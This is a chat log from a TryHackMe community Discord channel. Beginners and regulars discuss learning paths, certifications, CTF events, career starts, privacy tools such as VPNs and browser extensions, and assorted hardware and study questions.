#quiet-conversation

1 messages Β· Page 13 of 1

south inlet
#

Cyber Sec 101 is replacing it.

woven vortex
#

ah what will be the differences if you dont mind me asking?

south inlet
#

Cyber SEc 101 has content from the beginner path, and updated content too

#

The older path is really old content.

zinc iris
#

I just send you a request

hoary nymphBOT
#

Gave +1 Rep to @south inlet (current: #2 - 3443)

surreal quiver
# zinc iris I just send you a request

I haven't received any request and neither do I have any notifications of accepted requests. It also says I don't have any friends on tryhackme. Was I supposed get notifications? Something seems wrong. @zinc iris

surreal quiver
hoary nymphBOT
#

Gave +1 Rep to @south inlet (current: #2 - 3444)

zinc iris
surreal quiver
wheat torrent
wanton pewter
#

You can enroll and learn, it’s just the old pathways weren’t removed yet, which is going to happen now.

surreal quiver
#

Do any of you guys actually work in the field? How long have you been on THM

trail matrix
#

@weary meteor you are a bot , so they created you 5 years ago ?

surreal quiver
# weary meteor around 5 years

How was it starting out? After how long would you say you feel you mastered red teaming or blue teaming depending on what path you chose?

weary meteor
fair vine
bitter gale
#

bro is top 13 worldwide on thm leader board

surreal quiver
surreal quiver
weary meteor
fair vine
#

i did a study regarding it administration. did an internship for a multination company and from that company i got my first job in IT as a working student at the support desk, did my internship at the soc, worked at the soc

#

and now im here

#

i just got really lucky with internships

surreal quiver
surreal quiver
fair vine
#

im from the netherlands and working at a soc is pretty fun

#

i do alot of networks but i like endpoints more

proven cypress
#

is there any way to pay for the SAL1 in emi on a monthly basis?

south inlet
#

There isn't.

proven cypress
#

I am planning on taking this cert, but wanna check is there any option for emi?

south inlet
#

What's emi?

quartz cliff
#

Ig Emi is like they can pay half half amount no fully at a time

south inlet
#

Ah, I don't think THM offers that.

quartz cliff
#

Not sure I just guessed

bitter gale
fair vine
#

some low level cisco certs

#

no big certs that would need an exam or anything.

bitter gale
#

You are so lucky

#

In my region most employers asking for certs and working experience

fair vine
#

i just counted my internship times as experience

bitter gale
#

I think the hardest thing in cybersecurity is finding entry point

#

Like internship

fair vine
#

well i also think thats because people shoot high

#

just start at an support desk and work your way up from there, tell your bosses what your interested in and see if there are options

next bronze
#

@weary meteor congrats on becoming a room tester!

fair vine
#

oh damn congrats indeed. Very deserved

weary meteor
#

@next bronze @fair vine Thanks πŸ™‚

hoary nymphBOT
#

Gave +1 Rep to @next bronze (current: #222 - 35)

twilit lantern
#

kgb has officially joined team awesome

ocean pine
#

Kindest and most helpful of all 🫢 Congrats KGB!!

wanton pewter
#

Well congrats regardless, I am coming for your streaks πŸ—£οΈπŸ˜…

ocean pine
#

Wait I just realized I posted this on a completely different room

#

Sorry guys moving the post now

weary meteor
grim roost
#

hello everyone I just joined the discord !

weary meteor
grim roost
#

I recently started the learning path on tryhackme excitedd

weary meteor
hoary nymphBOT
#

Gave +1 Rep to @ocean pine (current: #254 - 28)

grim roost
#

how is everybody doing so farr

weary meteor
grim roost
#

all is well so far blobfingerguns

weary meteor
grim roost
#

thanks likewise!

odd acorn
#

Please be mindful of our advertisement guidelines #rules

zinc iris
#

hey everyone , I wonder , if I'm having a day and can't work for any reason , does all my streaks goes away , to zero ?

gray sierra
#

yeah unless you have bouses that can freeze it -_-

weary meteor
wheat torrent
weary meteor
regal tusk
#

Hey everyone! Hope you're all doing well. I’ve made the decision to go all in on cybersecurity and just upgraded to the premium membership. Wishing you all the best! This is my commitment to mastering the core concepts so I can help protect those vulnerable to malware online. πŸ₯· πŸ’» πŸ›œ

weary meteor
zinc iris
#

I didn't missed any day yet but I was wondering about it

#

how can I do streak freeze though ?

wild ice
weary meteor
simple bloom
#

Hi, guys. I am enjoying the Pre-Security lessons. Thanks to my mentor I've only known online who is kind enough to share these stuff to a newbie and answer my questions. The CS community is cool!

regal tusk
hoary nymphBOT
#

Gave +1 Rep to @zinc iris (current: #1340 - 3)

weary holly
rose viper
zinc iris
meager yarrow
#

I’m in the Linux Shell module in Cybersecurity 101, and I’m at the practical exercise that requires me to switch to root mode using sudo su to run a search with a script. However, I don’t know the root password for the machine, and I can’t find it anywhere. How can I proceed, or does anyone know the password?

regal jetty
meager yarrow
#

And what is the password, or where can I find it?

regal jetty
#

Did you have to log in to the linux user account you're in now? It should be the same password

#

Not sure, I haven't seen that exercise in a while, but you definitely don't need to know the root password to run 'sudo su'

meager yarrow
#

I managed to do it.

gentle condor
#

im pretty sure they state the root password if it is a different one in most rooms like that and otherwise it's the same as the user yeah

#

cool

weary meteor
deep lantern
#

Subscribing to THM will not mandate life time. One can cancel anytime right?

proper cloak
#

Ok

granite mesa
zinc iris
#

The internet was down for like 3 hours , I feel alive again !!!!

rose viper
tawdry dove
zinc iris
feral kelp
#

we are cybersec nerds if any of us didn’t have an internet addiction that would be hella surprising

feral kelp
#

hello kitty

dusky bough
zinc iris
#

If I set up a docker container, with a vulnerable cms version, can I try to attack it from my vm ?

#

and if I can does a command with a syntax like (nmap -sCV localhost) work

deep lantern
#

Good morning is the tryhackme site having issues?

fair vine
#

yes

#

We are investigating problems with the website, please be patient!
Sorry for the inconvenience.

Jabba Bravo

deep lantern
#

@fair vine np that angry guy was a JK

#

Ok after relaxing on the Switch, seems like the site is back!πŸ˜ƒ

#

Hmmmmm looks like there's still issues in the technical side on the site. When submitting answers I see red "An unknown error has occurred".

weary meteor
deep lantern
#

Yes issue resolved. Btw, I don't want to see tariffs imposed on Japan. The new Switch 2 is coming out this year and don't want heartattack price on the new console that would make it inaccessible.

warm panther
#

How can I access the reverse engineering room
It says it is private
Can anyone help me

south inlet
#

You can't, if it's private.

warm panther
#

There is no way to do that ??

south inlet
#

No. πŸ™‚

quaint basin
south inlet
quaint basin
#

Yeeeaaaaaap kekw

quaint basin
smoky mortar
merry adder
#

Good evening everyone. General question if you don’t mind. How can I access the SOC Simulator on the platform? TIA

jaunty totem
#

Anyone else in here that's having issues with starting the certification?

daring pulsar
#

Hii there! I wrote a blog on medium and want to submit that writeup to the CTF which I solved. But when I give the URL to my blog post it shows an invalid URL why? can any help me to solve this issue? Or is there another way to get approval to upload a writeups?

south inlet
#

URL encode

daring pulsar
#

Thanks @south inlet

hoary nymphBOT
#

Gave +1 Rep to @south inlet (current: #2 - 3490)

daring pulsar
south inlet
daring pulsar
#

yes, I used cyberchef to encode the url

south inlet
#

What did do to the @ ?

daring pulsar
#

I did not used @

south inlet
#

What did you use instead?

daring pulsar
#

I simply encode my url using URL encode. Is there anything

#

wrong

#

Can you tell me the syntax? It's little confusing

south inlet
#

Did you swap the @ for %40 ?

so

email=example@outlook.com becomes example%40outlook.com

daring pulsar
#

Yeah I did now, It's submitted. Thank you

south inlet
daring pulsar
#

1st time I thought that you mentioned giving @ to use encode URL for encoding and I did encode to all special characters which is why It was not accepted. When I only encoded the @ it was accepted. It's a misunderstanding. But I still did not have my writeups in there tab.

south inlet
#

Which room was it?

daring pulsar
#

Mr.Robot

south inlet
#

Ah, that's an older room, so it may or may not get accepted, depends on the activity of the author really.

daring pulsar
#

Yeah, It's fine. My job is to submit a blog.

daring pulsar
south inlet
daring pulsar
#

Yeah, It's worth having.

zinc iris
#

is there a room for cewl ?

south inlet
little shore
#

Other than that, there is a task for it in the 2023 AOC.

next bronze
#

I don't remember using cewl

little shore
#

Oh.. its Task 10 of AOC 2023. Apologies for the confusion.

next bronze
#

Np, I'll try out AOC 23 sometime

#

I tried 2019, but the machines are broken

turbid wasp
#

Nice, I just finished the SOC-2 learning path. Now I just need to decide if I'm going to keep charging ahead and take on the Security Engineer route or take a side quest on this SAL1 cert...πŸ€”

weary meteor
zinc iris
#

hi

#

I found this rome about tmux terminal , and wondered , does anyone of you using it , because I don't think I will leave the oringinal terminal and use it ?

weary meteor
fair vine
#

i use tmux almost daily, I think its very nice to have like splitscreens in your terminal. or the sessions, like starting my vpn in a session and then i can detach the session so it runs in the background, same goes for long processes like a bruteforce or something

#

you can ofcourse also use multiple terminal windows for it

fair vine
#

has anyone done the sentinel and kql rooms that are b2b?

wraith echo
#

Absolutely!

surreal quiver
#

check your mail

wraith echo
#

Hmm thats weird I accepted your request through the email but when I refresh THM I still see no friends

fair vine
#

@wraith echo you both need to add eachother im pretty sure

#

so you add ***** and **** adds you

surreal quiver
wraith echo
hoary nymphBOT
#

Gave +1 Rep to @fair vine (current: #202 - 39)

wraith echo
surreal quiver
fair vine
#

did anyone here ever use microsoft emulator?

cunning ridge
#

Hi. Want to join a team, and eventually able to join future THM events. πŸ’―

lone wasp
#

Guys any good vpn or proxy..
Coz I wanna change my vpn

south inlet
lone wasp
#

Want to hide my presence entirely

While scanning a web application

wraith echo
wraith echo
# lone wasp Guys any good vpn or proxy.. Coz I wanna change my vpn

Absolute top Mullvad vpn they offer to pay anonymously either in cash or by paying with Monero (XMR) aka anonymous crypto also if you pay with it they give you 0.5 euro off also you do not need to supply any personal details to register it's very robust with Wireguard available which is way faster and secure then OpenVPN protocol and if you combine that with its Mullvad browser with turned on proxy maybe also cloudflare proxy with turned on DoH in your OS itself it might be pretty good combo also don't forget to check hashes before starting installer and check for frequent browser leaks or turn wireshark and dive in. Sadly Mullvad is in 14 Alliance but they say they don't share its info also it has strict no-log privacy another variant is Proton VPN you can buy a full proton ecosystem which I can highly recommend. The VPN itself is very nice I tried it and nice but the design is a little off my expectations not as minimalistic and smooth as Mullvad but pretty nice too! Proton VPN is outside the 14 alliance and as I said in combo with its ecosystem might be very powerful! You can also check its free trial on Proton VPN and last variant is IVPN which I don't know much about so I would recommend you to go check it out by yourself but I heard nice things about it.

wraith echo
# lone wasp Want to hide my presence entirely While scanning a web application

Okay, let's dive into it! To hide your presence entirely you must understand HOW protocols work, HOW is your traffic processed WHERE is processed, and also the fundamentals of how web servers behave. Let's start with choosing the right browser. Browsers collect info about you or more specifically websites collect thousands of info about you once you visit them they call numerous APIs. Those contact your browsers and the browser gives them your info. For a fast and nicely designed experience, I recommend Brave. For a slightly slower but more privacy-focused experience, I recommend the Mullvad browser, and for top privacy but the slowest I would say I recommend Tor. Tor is also in Brave but just so you know. Or for the highest I2P software. Next is the search engine. So many people used to think that DuckDuckGo is number one in this (also me) until I discovered that they collect your info BASED on how you interact so they will technically ASSUME what to collect. So I choose the Mullvad browser Mullvad leta which is slow and has its index but I would recommend Brave search engine it's nice and decent in its speed and has also its index. I love about Brave that you can use shortcuts to search through different search engines so if I want for example something quick to search or not important I simply type :g [your input] it's nice if you want to google dork cuz Brave search engine does not support that kind of thing. The next major thing is extensions. More extensions = slower experience but I don't mind tho. I use a couple I would say to hide my fingerprint as much as I can but it's kinda insane case I use this setting in just most extreme moments for simple searching would be enough: privacy badger (privacy in general), uMatrix or NoScript (block unwanted scripts), uBlock origin (privacy in general), Canvas Blocker (block APIs from sniffing on you), Decentraleyes (dont connect to CDN which could expose your info) ----- Part 1.

wraith echo
# lone wasp Want to hide my presence entirely While scanning a web application

In my Mullvad browser I use this combo if you want to take privacy seriously but its pretty slow I must say: NoScript, uBlock origin, privacy badger, Chameleon, Canvas Blocker, Decentraleyes, ClearURLs, Cookie AutoDelete. Just dont forget to configure browser settings properly! Thats cruicial thing. Alright now lets head to set up our traffic protection. We wanna talk about proxy and VPN. As I said in first message I use Mullvad VPN for me its just top. In order to secure your traffic (at least) from your ISP you have to configure DNS. Yeah thats the thing I did typo instead of DNS I wrote proxy. So yeah if you use windows in ethernet or wifi settings you can configure DNS. Normally its set to Auto or som but we want to set it to manual. I personally use Cloudflare DNS I know they keep logs for 24h but I dont have to care much cuz I dont do antyhing shady and my DNS is routing trough Mullvad is that fails then there is the backup of Cloudflare. Cloudflare offer free DNS resolver. Both for IPv4 and IPv6 but I would recommend using onyl IPv4 because IPv6 likes to leak or thats what I found on internet cant say its true tho. Once you put everything in place those IP addresses you need to select DNS over HTTPS (DoH) so its properly encrypted BUT DONT SELECT fallback to plaintext thats worst thing you can do. Now thats our backup. Now every website you visit auto logs your IP address and some other info depends on configuration of that server so you must be aware of that fact. If you chose to use Mullvad browser (which I highly recmmend but Brave is also fine) you got autp pre-installed extension from Mullvad. Its Mullvad proxy. If you set that up to completely different location then your VPN it could be nice combo. It might be slow but thats what privacy is about. Privacy cost us time these days. So yeah once you set everything up you can possibly start Wireshark and monitor your traffic to optionally re-configure something. DONT FORGET TO CHECK FOR B ROWSER LEAKS!

#

But dont hack without proper consent! Always ensure you have full permission to test what you want to test.

south inlet
#

@wraith echo Is this all from AI?

wraith echo
#

Nope this is totally from my expirience not a single prompt to AI just pure 6 years since my 10. @south inlet

surreal quiver
wraith echo
#

Sent🫑

radiant jacinth
#

hi guys do i really need in someday to use zeek from CLI (if i have SIEM ) ?

wraith echo
radiant jacinth
wraith echo
radiant jacinth
#

well i dont have setup atm im just studying but if u have videos like that will help me alot just give me the name of it i will take it from ther

#

like how to use it with Siem the best way

#

or something like that

#

and is it working with some better than other like some tools working with spluck better than let say ELK ?

wraith echo
# radiant jacinth and is it working with some better than other like some tools working with spluc...

I bet it does its at the end of the day its open source so I think it will totally work. I found some videos for you describing some combos with ZEEK with various of SIEMs I am not really educated in this field I know a little about it but all I have is sysmon with Powershell scripts and IDS soo yeah.

https://www.youtube.com/watch?v=IwlV3wVX4xs
https://www.youtube.com/watch?v=B20u53S72zA
https://www.youtube.com/watch?v=aqTHGRUEYgM

radiant jacinth
#

but thx alot m8 i will see what to do with zeek ❀️

#

thx alot brother for the help ❀️

wraith echo
#

No problem happy I could help at least a little😁 Wish you smooth studying

radiant jacinth
#

thx i hope u the best in life man ❀️

wraith echo
wraith echo
zinc iris
#

I'm so sleepy tonight even the easiest stuff not working with me , I'm going to bed

still sinew
#

i just keep getting coffee until my brain melts, then i can go to bed πŸ˜‚

weary meteor
#

@odd acorn

surreal quiver
#

Well I wouldn't really say epic there are better ones for sure.
Passionate yeah but there's still a lot to learn.
How about you how come you haven't done more on thm

wraith echo
#

Well its hard to manage time properly. I am freshly on highschool, I am trying to follow my dream and build my company which isnt easy cuz I found out the hosting provider I chose isnt capable for serving me good quality CMS go hugo linking DNS etc etc which I am learning while programming its such a mess, I am uploading on yt from ctf platforms which I am also writing writeups on gitbook so yeah I wish I could have more time for that

#

I spent all money on that hosting so I want to make it work till I have time

surreal quiver
wraith echo
surreal quiver
wraith echo
wraith echo
surreal quiver
wraith echo
# surreal quiver No what's hugo

Its SSG U heard it has fastest caching or som but I am building site with it and havent heard of it so I have to read every single documentation its pain

surreal quiver
wraith echo
zinc iris
#

hi

#

I never joined any events in THM and I wonder if anyone can explain how they work, is it like the normal ctfs on the site ?

#

I saw that there is an event coming and I don't want to join a team while I don't know everything to know

weary meteor
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #1 - 3862)

weary meteor
zinc iris
weary meteor
fair vine
#

general question, would you guys choose 24 or 27 inch for a monitor. Its used for work, gaming, movies. pretty much an all around used monitor. I currently have one 24 and one 27 inch, i just dont know what to choose and would like some opinions

boreal stag
#

27 for me

fading shore
#

I have two 27 monitors non wide, but with high gaming specs. I use them to work and of course to game.
Im considering getting a ultra wide one though, that you can also split the screen like two independent monitors, but these are quite expensive.

#

but id def stay with a minimum 27"

fair vine
#

Thanks guys

#

Ultrawide would be nice but i dont wanna throw out 2 good monitors for one

zinc iris
#

question

#

why the names in the server written in different colors ?

fading shore
#

there are also other special roles which will give different colors

hoary nymphBOT
#

Gave +1 Rep to @fading shore (current: #1351 - 3)

reef terrace
#

How to intercept a blutooth signal 🚦

south inlet
reef terrace
south inlet
reef terrace
south inlet
reef terrace
south inlet
sly trout
#

I'm boy not girl

jade lance
#

hey can someone help me in setting active directory for homelab

reef terrace
jade lance
reef terrace
south inlet
willow cloak
#

I am looking for a team to join for the new event (Hackfinity Battle) is there any team might be interested =?

willow cloak
south inlet
#

You need to be verified.

frail vaultBOT
next bronze
rugged frigate
#

great movie that

civic oak
#

is it recommended for beginners to join the hackfinity ?

weary meteor
chilly quiver
#

how many people are supposed to be in a hackfinity group?

#

like whats the maximumm

little shore
chilly quiver
#

thanks man sorry

fading shore
#

How such events like the hackfinity usually work ? Will there be different rooms inside it kinda like the Advent ?
Im asking because I wont be able to participate , but of course, if possible id like to access the "challenges" after

#

Ill be exactly on those days on a trip

little shore
hoary nymphBOT
#

Gave +1 Rep to @little shore (current: #12 - 779)

slender storm
#

who can help me w the tut vc?

weary meteor
radiant jacinth
#

Shhh it’s quiet 🀫

weary meteor
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #1 - 3928)

fair vine
#

not sure tho

weary meteor
hoary nymphBOT
#

Gave +1 Rep to @fair vine (current: #193 - 41)

civic rootBOT
#

Done!

slender storm
#

how do i join vcs?

south inlet
frail vaultBOT
vestal venture
#

this might seem stupid but i watched mr robot recently and it made really want to get into hacking and cyber security and stuff but i really dont know where to start or anything really . can i have some advice

#

lol i just want to make this sure my laptop isn't gonna get a virus from this

zinc iris
weary haven
glad marsh
#

FELLAS I NEED HELP

#

DM ME FOR MORE DETAILS

atomic swift
#

guys how is it going I'm getting ready for the next hack event this 17th I have a partner we need more mebers to complete the group of 5 DM me to send you the link

weary meteor
atomic swift
#

thank you so much

marble rampart
#

me: (clicks on AttackBox) ...waitwait Terminal -> sudo apt install emacs

placid kelp
#

Is anyone is there who need best a team member for solving rooms

lethal umbra
#

Hello

civic rootBOT
#

:hammer: raditya199#0 has been banned.

weary meteor
#

Try to reach out to support for account related issues . You can get in touch with them on the email below πŸ™‚

frail vaultBOT
#
TryHackMe's Email

TryHackMe's support email address.

zinc iris
#

anyone have avg antivirus ?

#

when I do scans , it tells me that I have 5g system junks ?!

#

what are these ?

south inlet
#

@near lagoon Please don't promote your own tools.

near lagoon
weary meteor
#

What's the problem ?

#

@south inlet

lucid viper
#

Pls who can help me on partitioning my hard drive for running dual OS

compact plinth
#

or look into grub if you still want dual boot

wet sky
#

Hi all, is there anyone I can add as friends? Would be nice to see other people's progress

sharp goblet
#

hey is anyone here who can help me to solve a ctf cryptography problem??

stable charm
#

Every day, a new challenge, a new skill learned, and a growing passion for cybersecurity! πŸ’»πŸ”

weary meteor
weary meteor
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #1 - 3967)

feral kelp
#

Damn bro you've been grinding on thm πŸ”₯

zinc iris
feral kelp
#

me too can i send a friend req

surreal quiver
#

Hey guys any idea on why does firefox remove my burp suite cert on kali vm? I get an error like I never imported it to firefox

surreal quiver
#

Yes I do regular updates

surreal quiver
little shore
#

That seems odd. Did you check if the root certificate is still valid?

surreal quiver
#

What do you mean by root cert? I'm a little new to this

stable charm
surreal quiver
wet sky
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #1 - 3983)

weary meteor
compact plinth
soft mango
#

how quiteness can be a conversation?

south inlet
zinc iris
shell ferry
unborn topaz
#

_whispering.... give me task 7 flagπŸ˜‚ _

hybrid ingot
earnest girder
cobalt sundial
#

Can anyone help me in ghost phishing how to find flag of it

chrome basin
#

can any one help me in task because my virtual machine not running

radiant jacinth
#

Shh it’s quiet 🀫

weary meteor
split flare
#

Anyone has any OSCP like boxes list on TRYHACKME in preparation for the exam?

hollow tendon
#

....

marble ridge
#

Hey guys, I was wondering if anyone here wants to be friends on TryHackMe, for me, seeing other people's progress helps me stay productive, here's my user if anyone's interestedπŸ™‚

User: Verax1ty

weary meteor
#

πŸ™‚

marble ridge
#

Awesome sauce

weary meteor
hoary nymphBOT
#

Gave +1 Rep to @marble ridge (current: #942 - 5)

marble ridge
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #1 - 4047)

tulip sleet
marble ridge
weary meteor
radiant jacinth
#

it's quiet

blissful raft
dull flower
placid kelp
#

Can anyone suggest me any room on try hack me for improve mobile application penetration testing?

brittle nacelle
#

why cant i upload images?

#

like in this channel

weary meteor
merry adder
#

Does the SAL 1 cert help in any way towards the CySA+ cert? TIA

weary meteor
merry adder
#

I will do. Thank you

pearl vector
#

guys, I just got notified by hackerone that my password was found in a credentials dump. But the password I used for hackerone was a randomly generated one. What could that mean

radiant jacinth
humble musk
drowsy onyx
#

Pretty vague question , ive talked about this a while ago im currently doing a personnal project with an hmailserver , i have a question , is there a way to know if my server is really blocking spams ? logs and stuff dont show anything i may have set something weirdly

umbral bloom
marble ridge
#

Accepted

umbral bloom
#

Nice

whole plank
#

Hey guys

tulip sleet
whole plank
#

Still working on hackfinity?

rugged frigate
#

@south inlet blobfingerguns

civic rootBOT
#

Done!

stark hemlock
stark hemlock
#

Awesome! I'll be sending one my username is THeCha0ticSe1g3!

marble ridge
#

Alright

stark hemlock
#

Thank you

marble ridge
#

Np, thank you for friending me :)

stark hemlock
#

You're welcome!

wet sky
marble ridge
hoary nymphBOT
#

Gave +1 Rep to @wet sky (current: #2759 - 1)

lucid viper
#

Also looking for friends here on Discord because we have same views and interests

astral cloak
dusky scarab
#

hi huys, im new here.

astral cloak
dusky scarab
astral cloak
#

feel free to add me as a friend if you ever wanna hang out and work on some things together. I'm very much a beginner but trying to find some friends to collaborate with and keep me motivated

weary meteor
wooden urchin
astral cloak
wooden urchin
astral cloak
#

kk

half onyx
#

@radiant jacinth @radiant jacinth

radiant jacinth
#

Hello

#

I speak English btw, and server rules state to only speak in English with all do respect brother or sister.

half onyx
#

Can you talk to me in private chat?

radiant jacinth
dull flower
#

SSH everyone, this is quiet conversation. kekw

snow lynx
#

Hi everyone

wraith echo
#

Possibly CyberChef I would say. cyberchef

placid kelp
#

i try already but no result

placid kelp
#

????

weary meteor
#

Is this from THM ?

placid kelp
#

yup

weary meteor
placid kelp
#

encryption

weary meteor
hollow zealot
#

.

radiant jacinth
#

@south inlet

civic rootBOT
#

Done!

hollow barn
uncut flower
#

Good afternoon is there anyone around to do some rooms? Dm if you wanna hang out and some things together

Spoiler: I'm a beginner too

rose heath
#

Study partner/guide for oscp, anyone interested please ping

astral cloak
jagged grotto
#

Has anyone done a CEH certification

prime pawn
#

Be vewy quiet. We’re hunting wabbits

weary meteor
olive laurel
#

hi

weary meteor
#

Please don't advertise external projects πŸ™‚

olive laurel
#

oh ok

civic oak
#

hey everyone Im planning to implement AI to my learning path. Im thinking about IBM AI engineering certificate program to start, and my question is that does anyone of you started or already implementing AI on cybersecurity I would like to get advices from you guys thanks.

weary meteor
steel fulcrum
#

Help

south inlet
#

Why do you need help?

coarse folio
#

Hi Guys
My name is St. Oasis and I am from Nigeria
I am new to TryHack me
I's all confusing
I'm done with School in a few months and I want to get a masters in cybersecurity but first I want to get a Job in IT.
A remote Job
I need help!

coarse folio
fathom knot
#

hello k

turbid wasp
#

I used a steak freeze on Saturday and I'm wondering when I can acquire a new one. I don't recall if I got my last one at 60 or 90 days. Do they coincide with the badges? If so, does that mean I can get the next one at 365 days? (I'm currently at 113 days)

weary meteor
turbid wasp
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #1 - 4189)

royal jasper
#

Good day, have anyone tried here changing email address? After changing my email address, all the progress and my subscription restarted.

fair vine
#

hi guys is there anyone who could give a second opinion on the monitor and hard drive im planning to buy?

frail vaultBOT
#
TryHackMe's Email

TryHackMe's support email address.

finite gull
#

hello there

floral matrix
earnest girder
#

i'm bored

finite gull
#

iv been planning buy the premium version , anyone care to share your opinion?

weary meteor
forest pagoda
#

anyone wants to start a startup?

frail basin
median fossil
#

Would love to get some friends on Tryhackme, I'm currently a student in cybersecurity and on a few learning paths here right now and it would be great to get some motivation from others who is learning as well. Feel free to add: bystrom πŸ˜„

weary meteor
#

Request accepted @median fossil πŸ™‚ 🀝

warped badger
#

in a CTF, do i'm supposed to use only the Verified exploit ?

daring vapor
#

Also remember that exploitdb is not the only source for exploits

hoary nymphBOT
#

Gave +1 Rep to @daring vapor (current: #282 - 25)

weary meteor
# warped badger in a CTF, do i'm supposed to use only the Verified exploit ?

In a THM lab environment you can do whatever you want , they're restored to defaults on each restart πŸ™‚ . In real life scenario , that verification won't also mean much anyway . By using exploit we're trying to perform something that clearly wasn't supposed to be happening , many exploits are unstable and will crash the machine in some cases ( eternalBlue ) as an example .

hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #1 - 4206)

south inlet
left portal
#

πŸ€“β˜οΈ

inland hollow
#

Does anyone know how much the EXP-401 exam cost offered by OffSec?

coarse river
#

Hey, I'm wondering. What kind of motor would I need to use to lift up an heavy weight (~10kg) at the end of a fishing line : servo, stepper or dc ? Maybe some other kind that I don't know of

weary meteor
coarse folio
weary meteor
coarse folio
#

I am new here and I'm sorry if it's too much but I need help
I'll been done with school in a few months and I want to master in cybersecurity. I love security a lot and I have done Comptia A and N+ a while back and I know now, I have some to relearn a lot. So I took google's IT support Programme. After that, I wanted to take the Cybersecurity course but I saw Tryhackme and I don't even know what way to go or how to start. There's a lot of material on the internet and It can be frustrating. I need Help

weary meteor
coarse folio
#

Thank you

weary meteor
coarse folio
#

Thank you

whole tiger
#

hi,

i want to know this scenario is real vulnerability or not

a weak 2FA setup where the system allows the use of an untrusted browser extension (such as the Authenticator extension in Chrome) to configure two-factor authentication. This indicates improper device binding or context validation during the 2FA setup, allowing an attacker to potentially hijack the 2FA process. To mitigate this, the system should enforce strict device verification and context checks to ensure that only trusted devices can configure and use 2FA.

warped badger
#

thank you i will !

hoary nymphBOT
#

πŸ”‡ Muted charleskeith0134 for 1 day

odd acorn
#

Hey please don't self promote here

neon plank
muted chasm
#

gut morning

#

or night should i say

marble rampart
#

Jr Pentester path complete! πŸ₯³

weary meteor
radiant jacinth
humble sentinel
wild nacelle
#

Realtek RTL8723B Wireless LAN 802. 11n USB 2.0 Network adapter . Hallo everybody I tried to install kali Linux on my laptop but the install setup kannst find the driver for my network kart anyone that can help thx

frail basin
# wild nacelle Realtek RTL8723B Wireless LAN 802. 11n USB 2.0 Network adapter . Hallo everybod...

I wouldn’t recommend installing a bunch of drivers from random sites. Are you trying to install it bare metal or as a virtual machine? I would recommend you use VMWare (watch a YouTube video on how to get it free) and then watch a YouTube video on installing the Kali image on VMWare for your first installs. Keep in mind that for windows computers it will be VMware workstation vs Mac OS it is VMware Fusion.

wild nacelle
#

My laptop can't handle vm it can't even handle win 10 probably

radiant jacinth
#

Shh it is quiet

split flare
#

I was solving the room kenobi and I found a different path than the one in the walk through. Not sure if this is intended also not sure if this is an issue and if this is the place to report such. To avoid spoilers admins can write me in private.

lofty arch
#

there is any voice channel ?

weary meteor
radiant jacinth
#

Greetings, hope everyone is having a very productive day animewave

weary meteor
hoary nymphBOT
#

Gave +1 Rep to @cloud mantle (current: #2778 - 1)

lofty wadi
#

Hello everyone, Im new in Tryhackme, but im having an issue in "Windows PowerShell" entering the credentials, but i cant, so if anyone had the same situation that could help me out, cheers

weary meteor
fringe sluice
#

I had something to say but forgot what I wanted to say.

weary meteor
sharp pivot
#

Hi guys I'm chef from India doing master's in computer application called Mca in India I live tier 3 city, I'm new cyber security just started,
The Situation is i got job offer in school for IT admin timing in 7am to 4pm salary is 15000 inr
I'm confused what to do according to my city this is not too much low salary but it's low little bit , in india you do unpaid internship or paid internship amount is 3000-20000 depends upon city region
My friend is doing job in state captial as vuejs developer his company giving 29000 salary but his expenses like rent miscellaneous expenses are high after everything he got 15000-18000 in hand
My job offering office is only 600 meter and 0 expenses I'll pay
Why I'm thinking for this IT admin role reason is it's hard to job in cyber security as freshers if I get I'll receive same pay like my and same expenses
I'm thinking to join this job for 1 year learn cyber security at the advance it will receive one year experience
What should I do please help me

prime perch
#

@sharp pivot join, atmost you'll gain experience in Networking, meanwhile keep learning other aspects, keep trying for relevant certifications and finally keep looking for better opportunities if you feel you've learned everything that that job has to offer. Best of luck buddy!

lament rock
sharp pivot
deft marsh
steady oxide
#

Hey everyone, I'm new here. I'm looking for fellow students (both Italian and international) to chat about cyber security topics, discuss projects, or just exchange a few words about career paths. I've been studying every day for the past 6 months, and I'd love to connect with others who are still students like me. Hope I posted this in the right spotβ€”if not, sorry about that!

winter pine
#

Hello guys, I'm doing telnet but it seems the Get command is not working also what should be the Host? Any guidance plsπŸ₯Ή

weary meteor
weary meteor
surreal quiver
#

Can anyone recommend a good site for learning python that's free?

weary meteor
surreal quiver
#

Thanks I'll check them out

winter pine
weary meteor
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #1 - 4317)

coarse river
surreal quiver
hoary nymphBOT
#

Gave +1 Rep to @coarse river (current: #1824 - 2)

weary meteor
barren cloud
marsh lance
#

Which rooms will help get ready for the cysa+ exam? Any ideas?

weary meteor
marsh lance
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #1 - 4323)

surreal quiver
boreal maple
weary meteor
#

It is called Udemy plus i think

boreal maple
weary meteor
surreal quiver
boreal maple
surreal quiver
hoary nymphBOT
#

Gave +1 Rep to @boreal maple (current: #2787 - 1)

weary meteor
neon dirge
weary meteor
neon dirge
uneven lava
fair vine
#

whats this

uneven lava
#

Nevermind, nothing serious

south inlet
uneven lava
# south inlet Hi What is this?

Simply a joke, but apparently no one is falling for it.
I've concealed the YouTube link behind a simple URL shortener.
Date + YouTube = ?

south inlet
uneven lava
next bronze
#

When it loads for 20 seconds, get out kekw

quaint basin
#

On numerous occasions, I might add kekw

uneven lava
#

Well, I figured that it wasn't so difficult to open it in a v-box, maybe with a live even.
I mean... It's something that we all use here.
When I've received it, it was my first approach to copy the link and open it that way πŸ˜…

serene trench
next bronze
#

I mean, if someone you trust got compromised, its likely

#

I'd trust a link from one of my family members, for example πŸ€·β€β™‚οΈ

uneven lava
#

Ok then, maybe you'll like this more.
Funny, even if not "today" related

twin ridge
#

commit strip is great

trail shale
trail shale
marble ridge
spark haven
trail shale
pearl vector
#

omg THM sponsored Fireship!

still sinew
warm crest
#

yha last video

still sinew
#

i’ll check it out

olive laurel
tender lagoon
#

quiet

cyan smelt
#

Hello, I'm new here. I'm looking for study buddy or study groups for TryHackMe or HacktheBox(pentesting)? Thanks

marble wind
#

hi

nocturne lodge
boreal minnow
verbal oriole
smoky gale
#

